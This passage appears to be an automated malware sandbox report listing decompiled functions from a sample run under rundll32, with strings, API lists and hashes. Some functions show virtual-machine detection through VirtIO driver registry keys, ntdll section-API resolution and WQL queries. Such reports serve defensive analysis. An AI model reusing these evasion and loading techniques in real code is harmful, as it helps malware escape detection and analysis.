                                        0x21ef2ffda48
                                        0x21ef2ffda72

                                        APIs
                                        Strings
                                        • class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char>, xrefs: 0000021EF2FFD7D5, 0000021EF2FFD892
                                        • field name too large, xrefs: 0000021EF2FFD78D
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/fields.ipp, xrefs: 0000021EF2FFD7E0, 0000021EF2FFD89D
                                        • field value too large, xrefs: 0000021EF2FFD84A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$Throw$Concurrency::cancel_current_taskFileHeaderRaise
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/fields.ipp$class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char>$field name too large$field value too large
                                        • API String ID: 2268884189-437498112
                                        • Opcode ID: 8b94da2d244788e01d6954675266b636e1148d6a6959ee6a0656242e89a3e3da
                                        • Instruction ID: 1798307bc06c5e1acc5c25c56136e2bbe9e280e2c7bd1dd08d06145fa7857590
                                        • Opcode Fuzzy Hash: 8b94da2d244788e01d6954675266b636e1148d6a6959ee6a0656242e89a3e3da
                                        • Instruction Fuzzy Hash: 9D91C573225B8081EF508B54E8543EA73B4F7A4754F425316EE8D53BA9EB3CC596C344
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302A2A0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 167registryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E0000021E21EF302A2A0() {
				void* _t40;
				void* _t41;
				intOrPtr _t50;
				void* _t73;
				signed long long _t74;
				signed long long _t75;
				char* _t79;
				signed long long _t80;
				long long _t81;
				long long _t91;
				signed long long _t94;
				int _t98;
				long long _t101;
				int _t102;
				void* _t103;
				signed long long _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				long long _t108;
				signed long long _t110;
				long long _t111;
				void* _t115;
				void* _t116;
				long _t117;

				 *((long long*)(_t105 + 8)) = _t81;
				 *((long long*)(_t105 + 0x10)) = _t91;
				 *((long long*)(_t105 + 0x18)) = _t108;
				 *((long long*)(_t105 + 0x20)) = _t111;
				E0000021E21EF310C220();
				_t106 = _t105 - _t73;
				_t104 = _t106 + 0x50;
				_t74 =  *0xf3203000; // 0x1fc8e4a4378e
				_t75 = _t74 ^ _t104;
				 *(_t104 + 0x210) = _t75;
				GetStdHandle(_t117);
				_t80 = _t75;
				if (_t75 == 0) goto 0xf302a362;
				if (GetFileType(_t116) == 0) goto 0xf302a362;
				_t40 = E0000021E21EF301E120(_t39);
				 *((long long*)(_t106 + 0x28)) = _t104 + 0x268;
				 *(_t106 + 0x20) = _t102;
				r8d = 0x200;
				0xf3116a8c();
				_t41 =  <  ? 0xffffffff : _t40;
				if (_t41 < 0) goto 0xf302a344;
				 *(_t106 + 0x20) = _t102;
				r8d = _t41;
				WriteFile(_t103, ??, ??, ??);
				goto 0xf302a52c;
				_t50 = E0000021E21EF302A5B0( *((intOrPtr*)(_t104 + 0x260))) + 1;
				_t15 = _t75 + _t75 + 0xf; // 0x10
				if (_t15 - _t75 + _t75 > 0) goto 0xf302a38b;
				E0000021E21EF310C220();
				_t107 = _t106 - 0xfffffff0;
				if (_t107 + 0x50 != 0) goto 0xf302a3b2;
				_t101 = L"no stack?";
				goto 0xf302a47a;
				 *((intOrPtr*)(_t107 + 0x28)) = _t50;
				r9d = _t50;
				 *((long long*)(_t107 + 0x20)) = _t101;
				if (MultiByteToWideChar(_t98, _t102, _t79) != 0) goto 0xf302a3f7;
				_t94 = _t102;
				if (_t80 == 0) goto 0xf302a3f7;
				 *((short*)(_t101 + _t94 * 2)) =  *((char*)(_t94 +  *((intOrPtr*)(_t104 + 0x260))));
				if (_t94 + 1 - _t80 < 0) goto 0xf302a3e0;
				_t110 = _t102;
				if (_t80 == 0) goto 0xf302a47a;
				r10d = 0x53;
				r11d = _t115 + 0x20;
				r14d = _t115 - 0x10;
				r15d = _t115 + 0x10;
				if ( *((short*)(_t101 + _t110 * 2)) != 0x25) goto 0xf302a472;
				if (( *(_t101 + 2 + _t110 * 2) & 0x0000ffff) + 0xffffffd6 - 0x49 > 0) goto 0xf302a472;
				goto __rcx;
			}




























                                        0x21ef302a2a0
                                        0x21ef302a2a5
                                        0x21ef302a2aa
                                        0x21ef302a2af
                                        0x21ef302a2c1
                                        0x21ef302a2c6
                                        0x21ef302a2c9
                                        0x21ef302a2ce
                                        0x21ef302a2d5
                                        0x21ef302a2d8
                                        0x21ef302a2e4
                                        0x21ef302a2ea
                                        0x21ef302a2f0
                                        0x21ef302a2fd
                                        0x21ef302a306
                                        0x21ef302a316
                                        0x21ef302a322
                                        0x21ef302a32a
                                        0x21ef302a331
                                        0x21ef302a33b
                                        0x21ef302a340
                                        0x21ef302a348
                                        0x21ef302a34d
                                        0x21ef302a357
                                        0x21ef302a35d
                                        0x21ef302a373
                                        0x21ef302a378
                                        0x21ef302a37f
                                        0x21ef302a392
                                        0x21ef302a397
                                        0x21ef302a3a4
                                        0x21ef302a3a6
                                        0x21ef302a3ad
                                        0x21ef302a3b2
                                        0x21ef302a3b6
                                        0x21ef302a3bb
                                        0x21ef302a3ca
                                        0x21ef302a3cc
                                        0x21ef302a3d2
                                        0x21ef302a3eb
                                        0x21ef302a3f5
                                        0x21ef302a3f7
                                        0x21ef302a3fd
                                        0x21ef302a3ff
                                        0x21ef302a40c
                                        0x21ef302a410
                                        0x21ef302a414
                                        0x21ef302a41e
                                        0x21ef302a439
                                        0x21ef302a451

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite_invalid_parameter_noinfo
                                        • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                        • API String ID: 3447168048-278800372
                                        • Opcode ID: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction ID: 6aa16a416b55a6f6548ee5cb6ae0d5ac5e603c608512536afcd3762e02651933
                                        • Opcode Fuzzy Hash: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction Fuzzy Hash: 5A61E072200B8096EF208F21EC483DA77A4F769B94F464626EE5A47F99DF3CC652C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301BAE0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 96libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 27%
                                        			E0000021E21EF301BAE0(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				intOrPtr _v88;
				void* _v96;
				long long _v104;
				long long _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				void* __rbp;
				intOrPtr _t38;
				void* _t43;
				void* _t54;
				intOrPtr _t55;
				void* _t57;
				long long* _t63;
				void* _t89;
				long long* _t98;
				long long* _t99;

				_t86 = __rsi;
				_t64 = __rbx;
				_t63 = __rax;
				_t49 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t99 = __r8;
				_t98 = __rdx;
				_a32 = __rbx;
				_t55 = __ecx;
				_v96 = __rbx;
				_v88 = 0;
				_t7 = _t64 + 0x28; // 0x28
				r8d = _t7;
				E0000021E21EF310E410(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
				_v104 = __rbx;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v104 = _t55;
				_v88 = 0x30;
				_v120 = __rsi;
				asm("xorps xmm0, xmm0");
				_v128 = 0x8000000;
				_v80 = __rsi;
				_t17 = _t86 + 0x40; // 0x40
				_t38 = _t17;
				_v72 = __rsi;
				_v64 = _t38;
				_v136 = _t38;
				asm("movdqu [ebp-0x10], xmm0");
				if ( *_t63() < 0) goto 0xf301bbfe;
				GetCurrentProcess();
				if (E0000021E21EF301B9B0(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0xf301bc05;
				r8d = _v104;
				E0000021E21EF310E410(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
				 *_t98 = _v96;
				if (_t99 == 0) goto 0xf301bc05;
				 *_t99 = _a32;
				goto 0xf301bc09;
				_t43 =  *_t63();
				if (_a32 == 0) goto 0xf301bc16;
				if (_t99 != 0) goto 0xf301bc16;
				 *_t63();
				return _t43;
			}























                                        0x21ef301bae0
                                        0x21ef301bae0
                                        0x21ef301bae0
                                        0x21ef301bae0
                                        0x21ef301bae0
                                        0x21ef301bae5
                                        0x21ef301baea
                                        0x21ef301bb04
                                        0x21ef301bb07
                                        0x21ef301bb0a
                                        0x21ef301bb0e
                                        0x21ef301bb10
                                        0x21ef301bb16
                                        0x21ef301bb19
                                        0x21ef301bb19
                                        0x21ef301bb21
                                        0x21ef301bb2d
                                        0x21ef301bb31
                                        0x21ef301bb44
                                        0x21ef301bb57
                                        0x21ef301bb6a
                                        0x21ef301bb70
                                        0x21ef301bb79
                                        0x21ef301bb83
                                        0x21ef301bb88
                                        0x21ef301bb8b
                                        0x21ef301bb97
                                        0x21ef301bb9b
                                        0x21ef301bb9b
                                        0x21ef301bb9e
                                        0x21ef301bba7
                                        0x21ef301bbae
                                        0x21ef301bbb2
                                        0x21ef301bbbb
                                        0x21ef301bbbd
                                        0x21ef301bbd7
                                        0x21ef301bbd9
                                        0x21ef301bbe3
                                        0x21ef301bbec
                                        0x21ef301bbf3
                                        0x21ef301bbf9
                                        0x21ef301bbfc
                                        0x21ef301bc00
                                        0x21ef301bc0c
                                        0x21ef301bc11
                                        0x21ef301bc13
                                        0x21ef301bc38

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$CurrentProcess
                                        • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                                        • API String ID: 1077269151-3111467594
                                        • Opcode ID: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction ID: 9138b31000c82e172b3ddcd654eed36ad6c0080374c66b51ec25a465888ee9c3
                                        • Opcode Fuzzy Hash: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction Fuzzy Hash: 3C412B32710B118AEB10DF66EC486DE37B4F758B98F164126EE4993B19DF38C486C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3120430 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E0000021E21EF3120430(void* __rbx, long long __rcx, long long __rdx, void* __rdi, struct _IO_FILE* __rsi, long __r14) {
				long _t32;
				int _t39;
				signed long long _t56;
				signed long long _t57;
				signed long long _t59;
				void* _t83;
				void* _t85;
				signed long long _t86;

				_t86 = _t85 - 0x4f0;
				_t56 =  *0xf3203000; // 0x1fc8e4a4378e
				_t57 = _t56 ^ _t86;
				 *(_t85 - 0x3f0 + 0x3e0) = _t57;
				 *((long long*)(_t86 + 0x40)) = __rcx;
				 *((long long*)(_t86 + 0x58)) = __rdx;
				r14d = r8d;
				 *(_t86 + 0x38) = r8d;
				GetStdHandle(__r14);
				_t6 = _t57 - 1; // -1
				if (_t6 - 0xfffffffd > 0) goto 0xf31204f9;
				_t32 = GetFileType(__rdi);
				if (_t32 != 2) goto 0xf31204f9;
				 *(_t86 + 0x28) = r14d;
				 *((long long*)(_t86 + 0x20)) = __rdx;
				0xf3120670();
				if (_t32 < 0) goto 0xf31204f9;
				_t59 = (_t57 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t86 + 0x60 + _t59 * 2)) != 0) goto 0xf31204c7;
				_t91 = _t86 + 0x30;
				 *((intOrPtr*)(_t86 + 0x30)) = 0;
				r8d = _t32;
				 *((long long*)(_t86 + 0x20)) = __rcx;
				if (WriteConsoleW(__rbx, _t83, ??) == 0) goto 0xf31204f9;
				abort();
				asm("int3");
				E0000021E21EF311768C(2, _t59);
				if (( *(_t59 + 0x14) & 0x000004c0) != 0) goto 0xf3120529;
				E0000021E21EF311768C(2, _t59);
				r9d = 0;
				_t20 = _t91 + 4; // 0x4
				r8d = _t20;
				E0000021E21EF312C8E4(0, _t59, _t57, _t59, _t86 + 0x60, _t86 + 0x30);
				L2();
				 *(_t86 + 0x48) = _t59;
				E0000021E21EF311768C(2, _t59);
				 *(_t86 + 0x50) = _t59;
				 *((long long*)(_t86 + 0x20)) = _t86 + 0x38;
				L1();
				E0000021E21EF311768C(2, _t86 + 0x38);
				_t39 = fflush(__rsi);
				abort();
				asm("int3");
				asm("int3");
				r10d =  *( *(_t86 + 0x28));
				 *(_t86 + 0x28) = r10d;
				goto 0xf312062c;
				asm("int3");
				asm("int3");
				return _t39;
			}











                                        0x21ef312043f
                                        0x21ef3120446
                                        0x21ef312044d
                                        0x21ef3120450
                                        0x21ef312045a
                                        0x21ef3120464
                                        0x21ef3120469
                                        0x21ef312046c
                                        0x21ef3120474
                                        0x21ef312047d
                                        0x21ef3120485
                                        0x21ef312048a
                                        0x21ef3120493
                                        0x21ef3120495
                                        0x21ef31204a4
                                        0x21ef31204b3
                                        0x21ef31204bc
                                        0x21ef31204c7
                                        0x21ef31204ce
                                        0x21ef31204d0
                                        0x21ef31204d5
                                        0x21ef31204d9
                                        0x21ef31204dc
                                        0x21ef31204f1
                                        0x21ef31204f3
                                        0x21ef31204f8
                                        0x21ef31204fe
                                        0x21ef312050c
                                        0x21ef3120513
                                        0x21ef3120518
                                        0x21ef3120520
                                        0x21ef3120520
                                        0x21ef3120524
                                        0x21ef312052b
                                        0x21ef3120535
                                        0x21ef312053a
                                        0x21ef312053f
                                        0x21ef3120553
                                        0x21ef3120562
                                        0x21ef312056c
                                        0x21ef3120574
                                        0x21ef3120579
                                        0x21ef312057e
                                        0x21ef312057f
                                        0x21ef312058e
                                        0x21ef3120594
                                        0x21ef3120599
                                        0x21ef312059e
                                        0x21ef312059f
                                        0x21ef31205a7

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort$ConsoleFileHandleTypeWritefflushswprintf
                                        • String ID: Assertion failed: %Ts, file %Ts, line %d$Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1760031326-1349988364
                                        • Opcode ID: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction ID: b50ca6ed8af4281986b815c90b50136c4e22cf7451d836048af516b3e4460301
                                        • Opcode Fuzzy Hash: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction Fuzzy Hash: 38315E71214A8086EB24AB65EC597DB73F4E7A07A0F414316AE9903EDADF3CC906C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020250 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 61registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 21%
                                        			E0000021E21EF3020250(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				char _v536;
				long long _v544;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				char _v600;
				long long _v616;
				void* __rdi;
				void* _t30;
				void* _t33;
				void* _t35;
				signed long long _t39;
				void* _t58;
				void* _t60;
				void* _t64;
				void* _t67;

				_a8 = __rbx;
				_a16 = __rsi;
				_t39 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t39 ^ _t64 - 0x00000280;
				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
				r8d = 0x200;
				E0000021E21EF310E410(_t30, 0, _t33, _t35,  &_v536, _t58, _t60, _t67);
				0xf301e130();
				_v600 = __rsi;
				r9d = 0x20019;
				_v616 =  &_v600;
				r8d = 0;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0xf3020339;
				if (__rbx + 1 - 7 < 0) goto 0xf30202d0;
				goto 0xf3020349;
				RegCloseKey(??);
				E0000021E21EF310C290();
				return 1;
			}
























                                        0x21ef3020250
                                        0x21ef3020255
                                        0x21ef3020262
                                        0x21ef302026c
                                        0x21ef302027d
                                        0x21ef302028b
                                        0x21ef3020297
                                        0x21ef30202a3
                                        0x21ef30202af
                                        0x21ef30202bb
                                        0x21ef30202c7
                                        0x21ef30202d7
                                        0x21ef30202dd
                                        0x21ef30202fb
                                        0x21ef3020305
                                        0x21ef302030a
                                        0x21ef3020310
                                        0x21ef3020315
                                        0x21ef302032a
                                        0x21ef3020333
                                        0x21ef3020337
                                        0x21ef302033e
                                        0x21ef3020354
                                        0x21ef302036d

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                                        • API String ID: 47109696-2595593112
                                        • Opcode ID: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction ID: 5d016281e7230fd6a66b53cf5dcc7a082c407228552792105ac4a4c5712c154b
                                        • Opcode Fuzzy Hash: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction Fuzzy Hash: B531F836215B8092EA509B51F8887CBB3F8F798B84F524126EE8D43B68DF3CC516CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301D8E7 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E0000021E21EF301D8E7(void* __esi, long long __rax, char* __rbx, intOrPtr* __rsi, void* __r12, long long __r13) {
				void* _t91;
				void* _t92;
				void* _t98;
				void* _t101;
				long long* _t135;
				char* _t145;
				void* _t147;
				intOrPtr* _t157;
				intOrPtr* _t159;
				intOrPtr* _t175;
				void* _t184;
				short* _t185;
				intOrPtr* _t190;
				intOrPtr* _t191;
				long long* _t193;
				long long* _t202;
				void* _t204;

				_t145 = __rbx;
				_t135 = __rax;
				_t197 =  *__rsi;
				E0000021E21EF310B674(__rax, _t147);
				_t193 = __rax;
				 *((long long*)(_t202 + 0xa8)) = __rax;
				if (__rax == 0) goto 0xf301d91b;
				 *((long long*)(__rax + 8)) = __r13;
				 *((intOrPtr*)(__rax + 0x10)) = 1;
				_t148 =  *__rsi;
				E0000021E21EF310D920(_t101, __rbx,  *__rsi, _t197);
				 *_t193 = _t135;
				goto 0xf301d91e;
				 *((long long*)(_t202 + 8)) = __r13;
				if (__r13 != 0) goto 0xf301d932;
				E0000021E21EF310D8F0();
				E0000021E21EF310B674(_t135, _t148);
				 *((long long*)(_t202 + 0xa8)) = _t135;
				if (_t135 == 0) goto 0xf301d967;
				 *((long long*)(_t135 + 8)) = __r13;
				 *((intOrPtr*)(_t135 + 0x10)) = 1;
				E0000021E21EF310D920(_t101, _t145, "WQL", _t197);
				 *_t135 = _t135;
				goto 0xf301d96a;
				 *_t202 = __r13;
				if (__r13 != 0) goto 0xf301d97e;
				E0000021E21EF310D8F0();
				 *((long long*)(_t204 + 0x28)) = _t204 + 0x68;
				 *((long long*)(_t204 + 0x20)) = __r13;
				r9d = 0x30;
				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x58)))) + 0xa0))();
				_t106 = __esi;
				asm("lock inc ecx");
				if (__esi != 1) goto 0xf301d9eb;
				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301d9cc;
				__imp__#6();
				 *((long long*)(__r13)) = __r13;
				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301d9de;
				0xf310bdc8();
				 *((long long*)(__r13 + 8)) = __r13;
				0xf310bdc8();
				 *_t202 = __r13;
				asm("lock xadd [edi+0x10], eax");
				if (__esi != 1) goto 0xf301da2b;
				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301da0c;
				__imp__#6();
				 *((long long*)(__r13)) = __r13;
				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301da1e;
				0xf310bdc8();
				 *((long long*)(__r13 + 8)) = __r13;
				0xf310bdc8();
				 *((long long*)(_t202 + 8)) = __r13;
				if (r15d >= 0) goto 0xf301da4e;
				_t157 =  *((intOrPtr*)(_t204 + 0x58));
				if (_t157 == 0) goto 0xf301da44;
				 *((intOrPtr*)( *_t157 + 0x10))();
				goto 0xf301dbed;
				_t159 =  *((intOrPtr*)(_t204 + 0x68));
				if (_t159 == 0) goto 0xf301dbbd;
				 *((long long*)(_t202 - 0x70)) = __r13;
				 *((intOrPtr*)(_t202 + 0xa8)) = r13d;
				 *((long long*)(_t204 + 0x20)) = _t202 + 0xa8;
				r8d = 1;
				 *((intOrPtr*)( *_t159 + 0x20))();
				if ( *((intOrPtr*)(_t202 + 0xa8)) == 0) goto 0xf301dbb8;
				__imp__#8();
				if ( *((long long*)(_t202 - 0x70)) == 0) goto 0xf301dbb8;
				0xf3018a7c();
				_t184 =  >=  ?  *((void*)(_t202 - 0x28)) : _t202 - 0x28;
				_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70))));
				 *((long long*)(_t204 + 0x28)) = __r13;
				 *((long long*)(_t204 + 0x20)) = __r13;
				r8d = 0;
				_t91 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70)))) + 0x20))();
				_t185 =  *((intOrPtr*)(_t202 + 0x18));
				if (_t185 == 0) goto 0xf301db78;
				 *((long long*)(_t202 - 0x38)) = __r13;
				 *((long long*)(_t202 - 0x30)) = __r13;
				 *((long long*)(_t202 - 0x30)) = 7;
				 *((long long*)(_t202 - 0x38)) = __r13;
				 *((intOrPtr*)(_t202 - 0x48)) = r13w;
				if ( *_t185 != 0) goto 0xf301db10;
				goto 0xf301db1a;
				_t200 = __r13 + 1;
				if ( *((short*)(_t185 + (__r13 + 1) * 2)) != 0) goto 0xf301db10;
				_t92 = E0000021E21EF2FE8020(_t91, __esi, _t139, _t145, _t202 - 0x48, _t185, __r13, __r13 + 1, _t200);
				0xf3018bcc();
				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(_t92, __esi, _t145, _t204 + 0x70, _t139), _t106, _t202 + 0x30);
				if ( *((intOrPtr*)(_t202 - 0x30)) - 8 < 0) goto 0xf301db67;
				0xf2fe8550();
				 *((long long*)(_t202 - 0x30)) = 7;
				 *((long long*)(_t202 - 0x38)) = __r13;
				 *((intOrPtr*)(_t202 - 0x48)) = r13w;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70)))) + 0x10))();
				if ( *((intOrPtr*)(_t202 - 0x10)) - 8 < 0) goto 0xf301dba7;
				0xf2fe8550();
				 *((long long*)(_t202 - 0x10)) = 7;
				 *((long long*)(_t202 - 0x18)) = __r13;
				 *((intOrPtr*)(_t202 - 0x28)) = r13w;
				_t190 =  *((intOrPtr*)(_t204 + 0x58));
				if (_t190 == 0) goto 0xf301dbd5;
				 *((intOrPtr*)( *_t190 + 0x10))();
				_t191 =  *((intOrPtr*)(_t204 + 0x60));
				if (_t191 == 0) goto 0xf301dbed;
				 *((intOrPtr*)( *_t191 + 0x10))();
				_t175 =  *((intOrPtr*)(_t204 + 0x68));
				if (_t175 == 0) goto 0xf301dbf8;
				_t98 =  *((intOrPtr*)( *_t175 + 0x10))();
				 *((long long*)(_t145 + 0x18)) = 0xf;
				 *((long long*)(_t145 + 0x10)) = __r13;
				 *_t145 = 0;
				0xf2fe6770();
				 *((intOrPtr*)(_t204 + 0x50)) = 1;
				return E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t98, _t106, _t204 + 0x70), _t106, _t202 - 0x68);
			}




















                                        0x21ef301d8e7
                                        0x21ef301d8e7
                                        0x21ef301d8e7
                                        0x21ef301d8ef
                                        0x21ef301d8f4
                                        0x21ef301d8f7
                                        0x21ef301d901
                                        0x21ef301d903
                                        0x21ef301d907
                                        0x21ef301d90e
                                        0x21ef301d911
                                        0x21ef301d916
                                        0x21ef301d919
                                        0x21ef301d91e
                                        0x21ef301d925
                                        0x21ef301d92c
                                        0x21ef301d937
                                        0x21ef301d93f
                                        0x21ef301d949
                                        0x21ef301d94b
                                        0x21ef301d94f
                                        0x21ef301d95d
                                        0x21ef301d962
                                        0x21ef301d965
                                        0x21ef301d96a
                                        0x21ef301d971
                                        0x21ef301d978
                                        0x21ef301d98b
                                        0x21ef301d990
                                        0x21ef301d995
                                        0x21ef301d9a7
                                        0x21ef301d9ae
                                        0x21ef301d9b0
                                        0x21ef301d9b9
                                        0x21ef301d9c1
                                        0x21ef301d9c3
                                        0x21ef301d9c9
                                        0x21ef301d9d3
                                        0x21ef301d9d5
                                        0x21ef301d9da
                                        0x21ef301d9e6
                                        0x21ef301d9eb
                                        0x21ef301d9f1
                                        0x21ef301d9f9
                                        0x21ef301da01
                                        0x21ef301da03
                                        0x21ef301da09
                                        0x21ef301da13
                                        0x21ef301da15
                                        0x21ef301da1a
                                        0x21ef301da26
                                        0x21ef301da2b
                                        0x21ef301da32
                                        0x21ef301da34
                                        0x21ef301da3c
                                        0x21ef301da41
                                        0x21ef301da49
                                        0x21ef301da4e
                                        0x21ef301da56
                                        0x21ef301da5c
                                        0x21ef301da60
                                        0x21ef301da71
                                        0x21ef301da7a
                                        0x21ef301da82
                                        0x21ef301da8c
                                        0x21ef301da96
                                        0x21ef301daa1
                                        0x21ef301daae
                                        0x21ef301dabd
                                        0x21ef301dac6
                                        0x21ef301dac9
                                        0x21ef301dace
                                        0x21ef301dad7
                                        0x21ef301dada
                                        0x21ef301dadd
                                        0x21ef301dae4
                                        0x21ef301daea
                                        0x21ef301daee
                                        0x21ef301daf2
                                        0x21ef301dafa
                                        0x21ef301dafe
                                        0x21ef301db07
                                        0x21ef301db0c
                                        0x21ef301db10
                                        0x21ef301db18
                                        0x21ef301db21
                                        0x21ef301db2f
                                        0x21ef301db47
                                        0x21ef301db55
                                        0x21ef301db62
                                        0x21ef301db67
                                        0x21ef301db6f
                                        0x21ef301db73
                                        0x21ef301db7c
                                        0x21ef301db89
                                        0x21ef301db95
                                        0x21ef301dba2
                                        0x21ef301dba7
                                        0x21ef301dbaf
                                        0x21ef301dbb3
                                        0x21ef301dbbd
                                        0x21ef301dbc5
                                        0x21ef301dbcd
                                        0x21ef301dbd5
                                        0x21ef301dbdd
                                        0x21ef301dbe5
                                        0x21ef301dbe8
                                        0x21ef301dbf0
                                        0x21ef301dbf5
                                        0x21ef301dbf8
                                        0x21ef301dc00
                                        0x21ef301dc04
                                        0x21ef301dc0f
                                        0x21ef301dc14
                                        0x21ef301dc4d

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ConvertFree_com_issue_error_com_util::
